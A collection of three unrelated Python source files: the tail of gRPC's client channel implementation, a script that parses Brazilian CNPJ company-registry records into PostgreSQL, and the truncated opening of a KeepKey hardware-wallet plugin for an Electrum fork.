_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code], details)
self._state.cancelled = True
_abort(self._state, code, details)
self._state.condition.notify_all()
return False
def cancelled(self):
with self._state.condition:
return self._state.cancelled
def running(self):
with self._state.condition:
return self._state.code is None
def done(self):
with self._state.condition:
return self._state.code is not None
def result(self, timeout=None):
until = None if timeout is None else time.time() + timeout
with self._state.condition:
while True:
if self._state.code is None:
_wait_once_until(self._state.condition, until)
elif self._state.code is grpc.StatusCode.OK:
return self._state.response
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
raise self
def exception(self, timeout=None):
until = None if timeout is None else time.time() + timeout
with self._state.condition:
while True:
if self._state.code is None:
_wait_once_until(self._state.condition, until)
elif self._state.code is grpc.StatusCode.OK:
return None
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
return self
def traceback(self, timeout=None):
until = None if timeout is None else time.time() + timeout
with self._state.condition:
while True:
if self._state.code is None:
_wait_once_until(self._state.condition, until)
elif self._state.code is grpc.StatusCode.OK:
return None
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
try:
raise self
except grpc.RpcError:
return sys.exc_info()[2]
def add_done_callback(self, fn):
with self._state.condition:
if self._state.code is None:
self._state.callbacks.append(lambda: fn(self))
return
fn(self)
def _next(self):
with self._state.condition:
if self._state.code is None:
event_handler = _event_handler(self._state,
self._response_deserializer)
operating = self._call.operate(
(cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),),
event_handler)
if operating:
self._state.due.add(cygrpc.OperationType.receive_message)
elif self._state.code is grpc.StatusCode.OK:
raise StopIteration()
else:
raise self
while True:
self._state.condition.wait()
if self._state.response is not None:
response = self._state.response
self._state.response = None
return response
elif cygrpc.OperationType.receive_message not in self._state.due:
if self._state.code is grpc.StatusCode.OK:
raise StopIteration()
elif self._state.code is not None:
raise self
def __iter__(self):
return self
def __next__(self):
return self._next()
def next(self):
return self._next()
def is_active(self):
with self._state.condition:
return self._state.code is None
def time_remaining(self):
if self._deadline is None:
return None
else:
return max(self._deadline - time.time(), 0)
def add_callback(self, callback):
with self._state.condition:
if self._state.callbacks is None:
return False
else:
self._state.callbacks.append(callback)
return True
def initial_metadata(self):
with self._state.condition:
while self._state.initial_metadata is None:
self._state.condition.wait()
return self._state.initial_metadata
def trailing_metadata(self):
with self._state.condition:
while self._state.trailing_metadata is None:
self._state.condition.wait()
return self._state.trailing_metadata
def code(self):
with self._state.condition:
while self._state.code is None:
self._state.condition.wait()
return self._state.code
def details(self):
with self._state.condition:
while self._state.details is None:
self._state.condition.wait()
return _common.decode(self._state.details)
def debug_error_string(self):
with self._state.condition:
while self._state.debug_error_string is None:
self._state.condition.wait()
return _common.decode(self._state.debug_error_string)
def _repr(self):
with self._state.condition:
if self._state.code is None:
return '<_Rendezvous object of in-flight RPC>'
elif self._state.code is grpc.StatusCode.OK:
return _OK_RENDEZVOUS_REPR_FORMAT.format(
self._state.code, self._state.details)
else:
return _NON_OK_RENDEZVOUS_REPR_FORMAT.format(
self._state.code, self._state.details,
self._state.debug_error_string)
def __repr__(self):
return self._repr()
def __str__(self):
return self._repr()
def __del__(self):
with self._state.condition:
if self._state.code is None:
self._state.code = grpc.StatusCode.CANCELLED
self._state.details = 'Cancelled upon garbage collection!'
self._state.cancelled = True
self._call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[self._state.code],
self._state.details)
self._state.condition.notify_all()
def _start_unary_request(request, timeout, request_serializer):
deadline = _deadline(timeout)
serialized_request = _common.serialize(request, request_serializer)
if serialized_request is None:
state = _RPCState((), (), (), grpc.StatusCode.INTERNAL,
'Exception serializing request!')
rendezvous = _Rendezvous(state, None, None, deadline)
return deadline, None, rendezvous
else:
return deadline, serialized_request, None
def _end_unary_response_blocking(state, call, with_call, deadline):
if state.code is grpc.StatusCode.OK:
if with_call:
rendezvous = _Rendezvous(state, call, None, deadline)
return state.response, rendezvous
else:
return state.response
else:
raise _Rendezvous(state, None, None, deadline)
def _stream_unary_invocation_operationses(metadata, initial_metadata_flags):
return (
(
cygrpc.SendInitialMetadataOperation(metadata,
initial_metadata_flags),
cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
def _stream_unary_invocation_operationses_and_tags(metadata,
initial_metadata_flags):
return tuple((
operations,
None,
)
for operations in _stream_unary_invocation_operationses(
metadata, initial_metadata_flags))
def _determine_deadline(user_deadline):
parent_deadline = cygrpc.get_deadline_from_context()
if parent_deadline is None and user_deadline is None:
return None
elif parent_deadline is not None and user_deadline is None:
return parent_deadline
elif user_deadline is not None and parent_deadline is None:
return user_deadline
else:
return min(parent_deadline, user_deadline)
class _UnaryUnaryMultiCallable(grpc.UnaryUnaryMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def _prepare(self, request, timeout, metadata, wait_for_ready, compression):
deadline, serialized_request, rendezvous = _start_unary_request(
request, timeout, self._request_serializer)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
augmented_metadata = _compression.augment_metadata(
metadata, compression)
if serialized_request is None:
return None, None, None, rendezvous
else:
state = _RPCState(_UNARY_UNARY_INITIAL_DUE, None, None, None, None)
operations = (
cygrpc.SendInitialMetadataOperation(augmented_metadata,
initial_metadata_flags),
cygrpc.SendMessageOperation(serialized_request, _EMPTY_FLAGS),
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),
cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),
cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
)
return state, operations, deadline, None
def _blocking(self, request, timeout, metadata, credentials, wait_for_ready,
compression):
state, operations, deadline, rendezvous = self._prepare(
request, timeout, metadata, wait_for_ready, compression)
if state is None:
raise rendezvous # pylint: disable-msg=raising-bad-type
else:
call = self._channel.segregated_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
self._method, None, _determine_deadline(deadline), metadata,
None if credentials is None else credentials._credentials, ((
operations,
None,
),), self._context)
event = call.next_event()
_handle_event(event, state, self._response_deserializer)
return state, call
def __call__(self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, call, = self._blocking(request, timeout, metadata, credentials,
wait_for_ready, compression)
return _end_unary_response_blocking(state, call, False, None)
def with_call(self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, call, = self._blocking(request, timeout, metadata, credentials,
wait_for_ready, compression)
return _end_unary_response_blocking(state, call, True, None)
def future(self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, operations, deadline, rendezvous = self._prepare(
request, timeout, metadata, wait_for_ready, compression)
if state is None:
raise rendezvous # pylint: disable-msg=raising-bad-type
else:
event_handler = _event_handler(state, self._response_deserializer)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
self._method, None, deadline, metadata, None
if credentials is None else credentials._credentials,
(operations,), event_handler, self._context)
return _Rendezvous(state, call, self._response_deserializer,
deadline)
class _UnaryStreamMultiCallable(grpc.UnaryStreamMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def __call__( # pylint: disable=too-many-locals
self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
deadline, serialized_request, rendezvous = _start_unary_request(
request, timeout, self._request_serializer)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
if serialized_request is None:
raise rendezvous # pylint: disable-msg=raising-bad-type
else:
augmented_metadata = _compression.augment_metadata(
metadata, compression)
state = _RPCState(_UNARY_STREAM_INITIAL_DUE, None, None, None, None)
operationses = (
(
cygrpc.SendInitialMetadataOperation(augmented_metadata,
initial_metadata_flags),
cygrpc.SendMessageOperation(serialized_request,
_EMPTY_FLAGS),
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
self._method, None, _determine_deadline(deadline), metadata,
None if credentials is None else
credentials._credentials, operationses,
_event_handler(state,
self._response_deserializer), self._context)
return _Rendezvous(state, call, self._response_deserializer,
deadline)
class _StreamUnaryMultiCallable(grpc.StreamUnaryMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def _blocking(self, request_iterator, timeout, metadata, credentials,
wait_for_ready, compression):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_UNARY_INITIAL_DUE, None, None, None, None)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
augmented_metadata = _compression.augment_metadata(
metadata, compression)
call = self._channel.segregated_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
None, _determine_deadline(deadline), augmented_metadata, None
if credentials is None else credentials._credentials,
_stream_unary_invocation_operationses_and_tags(
augmented_metadata, initial_metadata_flags), self._context)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, None)
while True:
event = call.next_event()
with state.condition:
_handle_event(event, state, self._response_deserializer)
state.condition.notify_all()
if not state.due:
break
return state, call
def __call__(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, call, = self._blocking(request_iterator, timeout, metadata,
credentials, wait_for_ready, compression)
return _end_unary_response_blocking(state, call, False, None)
def with_call(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, call, = self._blocking(request_iterator, timeout, metadata,
credentials, wait_for_ready, compression)
return _end_unary_response_blocking(state, call, True, None)
def future(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_UNARY_INITIAL_DUE, None, None, None, None)
event_handler = _event_handler(state, self._response_deserializer)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
augmented_metadata = _compression.augment_metadata(
metadata, compression)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
None, deadline, augmented_metadata, None
if credentials is None else credentials._credentials,
_stream_unary_invocation_operationses(
metadata, initial_metadata_flags), event_handler, self._context)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, event_handler)
return _Rendezvous(state, call, self._response_deserializer, deadline)
class _StreamStreamMultiCallable(grpc.StreamStreamMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def __call__(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_STREAM_INITIAL_DUE, None, None, None, None)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
augmented_metadata = _compression.augment_metadata(
metadata, compression)
operationses = (
(
cygrpc.SendInitialMetadataOperation(augmented_metadata,
initial_metadata_flags),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
event_handler = _event_handler(state, self._response_deserializer)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
None, _determine_deadline(deadline), augmented_metadata, None
if credentials is None else credentials._credentials, operationses,
event_handler, self._context)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, event_handler)
return _Rendezvous(state, call, self._response_deserializer, deadline)
class _InitialMetadataFlags(int):
"""Stores immutable initial metadata flags"""
def __new__(cls, value=_EMPTY_FLAGS):
value &= cygrpc.InitialMetadataFlags.used_mask
return super(_InitialMetadataFlags, cls).__new__(cls, value)
def with_wait_for_ready(self, wait_for_ready):
if wait_for_ready is not None:
if wait_for_ready:
return self.__class__(self | cygrpc.InitialMetadataFlags.wait_for_ready | \
cygrpc.InitialMetadataFlags.wait_for_ready_explicitly_set)
elif not wait_for_ready:
return self.__class__(self & ~cygrpc.InitialMetadataFlags.wait_for_ready | \
cygrpc.InitialMetadataFlags.wait_for_ready_explicitly_set)
return self
class _ChannelCallState(object):
def __init__(self, channel):
self.lock = threading.Lock()
self.channel = channel
self.managed_calls = 0
self.threading = False
def reset_postfork_child(self):
self.managed_calls = 0
def _run_channel_spin_thread(state):
def channel_spin():
while True:
cygrpc.block_if_fork_in_progress(state)
event = state.channel.next_call_event()
if event.completion_type == cygrpc.CompletionType.queue_timeout:
continue
call_completed = event.tag(event)
if call_completed:
with state.lock:
state.managed_calls -= 1
if state.managed_calls == 0:
return
channel_spin_thread = cygrpc.ForkManagedThread(target=channel_spin)
channel_spin_thread.setDaemon(True)
channel_spin_thread.start()
def _channel_managed_call_management(state):
# pylint: disable=too-many-arguments
def create(flags, method, host, deadline, metadata, credentials,
operationses, event_handler, context):
"""Creates a cygrpc.IntegratedCall.
Args:
flags: An integer bitfield of call flags.
method: The RPC method.
host: A host string for the created call.
deadline: A float to be the deadline of the created call or None if
the call is to have an infinite deadline.
metadata: The metadata for the call or None.
credentials: A cygrpc.CallCredentials or None.
operationses: An iterable of iterables of cygrpc.Operations to be
started on the call.
event_handler: A behavior to call to handle the events resultant from
the operations on the call.
context: Context object for distributed tracing.
Returns:
A cygrpc.IntegratedCall with which to conduct an RPC.
"""
operationses_and_tags = tuple((
operations,
event_handler,
) for operations in operationses)
with state.lock:
call = state.channel.integrated_call(flags, method, host, deadline,
metadata, credentials,
operationses_and_tags, context)
if state.managed_calls == 0:
state.managed_calls = 1
_run_channel_spin_thread(state)
else:
state.managed_calls += 1
return call
return create
class _ChannelConnectivityState(object):
def __init__(self, channel):
self.lock = threading.RLock()
self.channel = channel
self.polling = False
self.connectivity = None
self.try_to_connect = False
self.callbacks_and_connectivities = []
self.delivering = False
def reset_postfork_child(self):
self.polling = False
self.connectivity = None
self.try_to_connect = False
self.callbacks_and_connectivities = []
self.delivering = False
def _deliveries(state):
callbacks_needing_update = []
for callback_and_connectivity in state.callbacks_and_connectivities:
callback, callback_connectivity, = callback_and_connectivity
if callback_connectivity is not state.connectivity:
callbacks_needing_update.append(callback)
callback_and_connectivity[1] = state.connectivity
return callbacks_needing_update
def _deliver(state, initial_connectivity, initial_callbacks):
connectivity = initial_connectivity
callbacks = initial_callbacks
while True:
for callback in callbacks:
cygrpc.block_if_fork_in_progress(state)
try:
callback(connectivity)
except Exception: # pylint: disable=broad-except
_LOGGER.exception(
_CHANNEL_SUBSCRIPTION_CALLBACK_ERROR_LOG_MESSAGE)
with state.lock:
callbacks = _deliveries(state)
if callbacks:
connectivity = state.connectivity
else:
state.delivering = False
return
def _spawn_delivery(state, callbacks):
delivering_thread = cygrpc.ForkManagedThread(
target=_deliver, args=(
state,
state.connectivity,
callbacks,
))
delivering_thread.start()
state.delivering = True
# NOTE(https://github.com/grpc/grpc/issues/3064): We'd rather not poll.
def _poll_connectivity(state, channel, initial_try_to_connect):
try_to_connect = initial_try_to_connect
connectivity = channel.check_connectivity_state(try_to_connect)
with state.lock:
state.connectivity = (
_common.CYGRPC_CONNECTIVITY_STATE_TO_CHANNEL_CONNECTIVITY[
connectivity])
callbacks = tuple(callback
for callback, unused_but_known_to_be_none_connectivity
in state.callbacks_and_connectivities)
for callback_and_connectivity in state.callbacks_and_connectivities:
callback_and_connectivity[1] = state.connectivity
if callbacks:
_spawn_delivery(state, callbacks)
while True:
event = channel.watch_connectivity_state(connectivity,
time.time() + 0.2)
cygrpc.block_if_fork_in_progress(state)
with state.lock:
if not state.callbacks_and_connectivities and not state.try_to_connect:
state.polling = False
state.connectivity = None
break
try_to_connect = state.try_to_connect
state.try_to_connect = False
if event.success or try_to_connect:
connectivity = channel.check_connectivity_state(try_to_connect)
with state.lock:
state.connectivity = (
_common.CYGRPC_CONNECTIVITY_STATE_TO_CHANNEL_CONNECTIVITY[
connectivity])
if not state.delivering:
callbacks = _deliveries(state)
if callbacks:
_spawn_delivery(state, callbacks)
def _subscribe(state, callback, try_to_connect):
with state.lock:
if not state.callbacks_and_connectivities and not state.polling:
polling_thread = cygrpc.ForkManagedThread(
target=_poll_connectivity,
args=(state, state.channel, bool(try_to_connect)))
polling_thread.setDaemon(True)
polling_thread.start()
state.polling = True
state.callbacks_and_connectivities.append([callback, None])
elif not state.delivering and state.connectivity is not None:
_spawn_delivery(state, (callback,))
state.try_to_connect |= bool(try_to_connect)
state.callbacks_and_connectivities.append(
[callback, state.connectivity])
else:
state.try_to_connect |= bool(try_to_connect)
state.callbacks_and_connectivities.append([callback, None])
def _unsubscribe(state, callback):
with state.lock:
for index, (subscribed_callback, unused_connectivity) in enumerate(
state.callbacks_and_connectivities):
if callback == subscribed_callback:
state.callbacks_and_connectivities.pop(index)
break
def _augment_options(base_options, compression):
compression_option = _compression.create_channel_option(compression)
return tuple(base_options) + compression_option + ((
cygrpc.ChannelArgKey.primary_user_agent_string,
_USER_AGENT,
),)
class Channel(grpc.Channel):
"""A cygrpc.Channel-backed implementation of grpc.Channel."""
def __init__(self, target, options, credentials, compression):
"""Constructor.
Args:
target: The target to which to connect.
options: Configuration options for the channel.
credentials: A cygrpc.ChannelCredentials or None.
compression: An optional value indicating the compression method to be
used over the lifetime of the channel.
"""
self._channel = cygrpc.Channel(
_common.encode(target), _augment_options(options, compression),
credentials)
self._call_state = _ChannelCallState(self._channel)
self._connectivity_state = _ChannelConnectivityState(self._channel)
cygrpc.fork_register_channel(self)
def subscribe(self, callback, try_to_connect=None):
_subscribe(self._connectivity_state, callback, try_to_connect)
def unsubscribe(self, callback):
_unsubscribe(self._connectivity_state, callback)
def unary_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return _UnaryUnaryMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def unary_stream(self,
method,
request_serializer=None,
response_deserializer=None):
return _UnaryStreamMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def stream_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return _StreamUnaryMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def stream_stream(self,
method,
request_serializer=None,
response_deserializer=None):
return _StreamStreamMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def _unsubscribe_all(self):
state = self._connectivity_state
if state:
with state.lock:
del state.callbacks_and_connectivities[:]
def _close(self):
self._unsubscribe_all()
self._channel.close(cygrpc.StatusCode.cancelled, 'Channel closed!')
cygrpc.fork_unregister_channel(self)
def _close_on_fork(self):
self._unsubscribe_all()
self._channel.close_on_fork(cygrpc.StatusCode.cancelled,
'Channel closed due to fork')
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._close()
return False
def close(self):
self._close()
def __del__(self):
# TODO(https://github.com/grpc/grpc/issues/12531): Several releases
# after 1.12 (1.16 or thereabouts?) add a "self._channel.close" call
# here (or more likely, call self._close() here). We don't do this today
# because many valid use cases today allow the channel to be deleted
# immediately after stubs are created. After a sufficient period of time
# has passed for all users to be trusted to hang out to their channels
# for as long as they are in use and to close them after using them,
# then deletion of this grpc._channel.Channel instance can be made to
# effect closure of the underlying cygrpc.Channel instance.
try:
self._unsubscribe_all()
except: # pylint: disable=bare-except
# Exceptions in __del__ are ignored by Python anyway, but they can
# keep spamming logs. Just silence them.
pass
|
extraicnpj.py
|
# -*- coding: utf-8 -*-
import sys
import io
from FilaDeLinhas import FilaDeLinhas
import threading
from GravaCnpj import GravacaoPgCopy
def trata(texto):
ok = texto
ok = ok.replace(';',' ')
ok = ok.replace('"',' ')
ok = ok.replace('\0','')
ok = ok.replace('\\','/')
ok = ok.strip()
while ' ' in ok:
ok = ok.replace(' ',' ')
return ok
def data(ymd : str) -> str:
if ymd == '00000000':
x = ''
else:
x = ymd[:4] + '-' + ymd[4:6] + '-' + ymd[6:8]
return x
def processatipo1(regsd : FilaDeLinhas,line):
cnpj = line[3:17]
matriz = line[17]
razsoc = trata(line[18:168])
fantasia = trata(line[168:223])
situac = line[223:225]
dt_situac = line[225:233]
motivo = line[233:235]
dt_ini = line[367:375]
cnae = line[375:382]
tipolog = line[382:402]
lograd = trata(line[402:462])
numend = trata(line[462:468])
comple = trata(line[468:624])
bairro = trata(line[624:674])
uf = line[682:684]
munic = trata(line[688:738])
email = trata(line[774:889])
capit = line[891:905]
capit = capit.strip()
capit = capit[:-2]+'.'+capit[-2:]
porte = line[905:907]
simples = line[907:909]
mei = line[924]
linha = cnpj+';'+matriz+';'+razsoc.strip()+';'+fantasia.strip()+';'+situac+';'+data(dt_situac)+';'+motivo+';'+data(dt_ini)+';'+cnae+';'+tipolog.strip()+';'+lograd.strip()+';'+numend.strip()+';'+comple.strip()+';'+bairro.strip()+';'+uf+';'+munic.strip()+';'+email.strip()+';'+capit+';'+porte+';'+simples+';'+mei+'\n'
linha = linha.encode('UTF-8','ignore').decode('UTF-8')
regsd.AdicionaLinha(linha)
return
def processatipo2(regss : FilaDeLinhas,line,ultlinha2):
cnpj = line[3:17]
socio = trata(line[18:168])
cpfsoc = line[168:182]
qualif = line[182:184]
dt_ent = line[189:197]
cpfleg = line[270:281]
linhasoc = cnpj+';'+socio.strip()+';'+cpfsoc+';'+qualif+';'+data(dt_ent)+';'+cpfleg+'\n'
if linhasoc in ultlinha2:
return ultlinha2
ultlinha2 = ultlinha2 + ' ' + linhasoc
linhasoc = linhasoc.encode('UTF-8','ignore').decode('UTF-8')
regss.AdicionaLinha(linhasoc)
return ultlinha2
def processatipo6(regsc : FilaDeLinhas,line):
cnpj = line[3:17]
cnae = line[17:710]
cnae = cnae.strip()
ult=''
while len(cnae) > 0:
cnaex = cnae[:7]
cnae = cnae[7:]
if cnaex in ult:
continue;
ult = ult + ' ' + cnaex
if cnaex == '0000000' or cnaex == '9999999':
break
regsc.AdicionaLinha(cnpj+';'+cnaex+'\n')
return
def tratar(origd,origs,origc,line,ultlinha2):
if line[0] == '0':
# registro header, nenhuma informação útil
return ultlinha2
if line[0] == '1':
# detalhes
processatipo1(origd,line)
ultlinha2=''
return ultlinha2
if line[0] == '2':
# sócios
ultlinha2=processatipo2(origs,line,ultlinha2)
return ultlinha2
if line[0] == '6':
processatipo6(origc,line)
# CNAEs secundárias
return ultlinha2
if line[0] == '9':
# registro trailler, nenhuma informação útil
return ultlinha2
return ultlinha2
def processark3200():
fprinc=sys.stdin.buffer
origd = FilaDeLinhas()
origs = FilaDeLinhas()
origc = FilaDeLinhas()
outd = threading.Thread(name='detalhe',target=GravacaoPgCopy, args=(origd,'detalhe'))
outs = threading.Thread(name='socios',target=GravacaoPgCopy, args=(origs,'socios'))
outc = threading.Thread(name='cnaes',target=GravacaoPgCopy, args=(origc,'cnaes'))
outd.start()
outs.start()
outc.start()
ultlinha2 = ''
linha = 1
lineb = fprinc.readline()
while lineb:
line = lineb.decode('ISO-8859-15','ignore')
ultlinha2=tratar(origd,origs,origc,line,ultlinha2)
lineb = fprinc.readline()
linha=linha+1
origd.Acabou = True
origs.Acabou = True
origc.Acabou = True
processark3200()
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum_onion.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum_onion.bip32 import BIP32Node
from electrum_onion import constants
from electrum_onion.i18n import _
from electrum_onion.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum_onion.keystore import Hardware_KeyStore
from electrum_onion.plugin import Device, runs_in_hwd_thread
from electrum_onion.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
get_xpubs_and_der_suffixes_from_txinout)
if TYPE_CHECKING:
import usb1
from .client import KeepKeyClient
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
plugin: 'KeepKeyPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
@runs_in_hwd_thread
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
@runs_in_hwd_thread
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None and not txin.is_segwit():
raise UserFacingException(_('Missing previous tx for legacy input.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard')#, 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
import keepkeylib.transport_webusb
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
keepkeylib.transport_webusb.DEVICE_IDS)
# only "register" hid device id:
self.device_manager().register_devices(keepkeylib.transport_hid.DEVICE_IDS, plugin=self)
# for webusb transport, use custom enumerate function:
self.device_manager().register_enumerate_func(self.enumerate)
self.libraries_available = True
except ImportError:
self.libraries_available = False
@runs_in_hwd_thread
def enumerate(self):
from keepkeylib.transport_webusb import WebUsbTransport
results = []
for dev in WebUsbTransport.enumerate():
path = self._dev_to_str(dev)
results.append(Device(path=path,
interface_number=-1,
id_=path,
product_key=(dev.getVendorID(), dev.getProductID()),
usage_page=0,
transport_ui_string=f"webusb:{path}"))
return results
@staticmethod
def _dev_to_str(dev: "usb1.USBDevice") -> str:
return ":".join(str(x) for x in ["%03i" % (dev.getBusNumber(),)] + dev.getPortNumberList())
@runs_in_hwd_thread
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
@runs_in_hwd_thread
def webusb_transport(self, device):
from keepkeylib.transport_webusb import WebUsbTransport
for dev in WebUsbTransport.enumerate():
if device.path == self._dev_to_str(dev):
return WebUsbTransport(dev)
@runs_in_hwd_thread
def _try_hid(self, device):
self.logger.info("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.logger.info(f"cannot connect at {device.path} {e}")
return None
@runs_in_hwd_thread
def _try_webusb(self, device):
self.logger.info("Trying to connect over WebUSB...")
try:
return self.webusb_transport(device)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
@runs_in_hwd_thread
def create_client(self, device, handler):
if device.product_key[1] == 2:
transport = self._try_webusb(device)
else:
transport = self._try_hid(device)
if not transport:
self.logger.info("cannot connect to device")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
@runs_in_hwd_thread
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['KeepKeyClient']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "DeepOnion"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
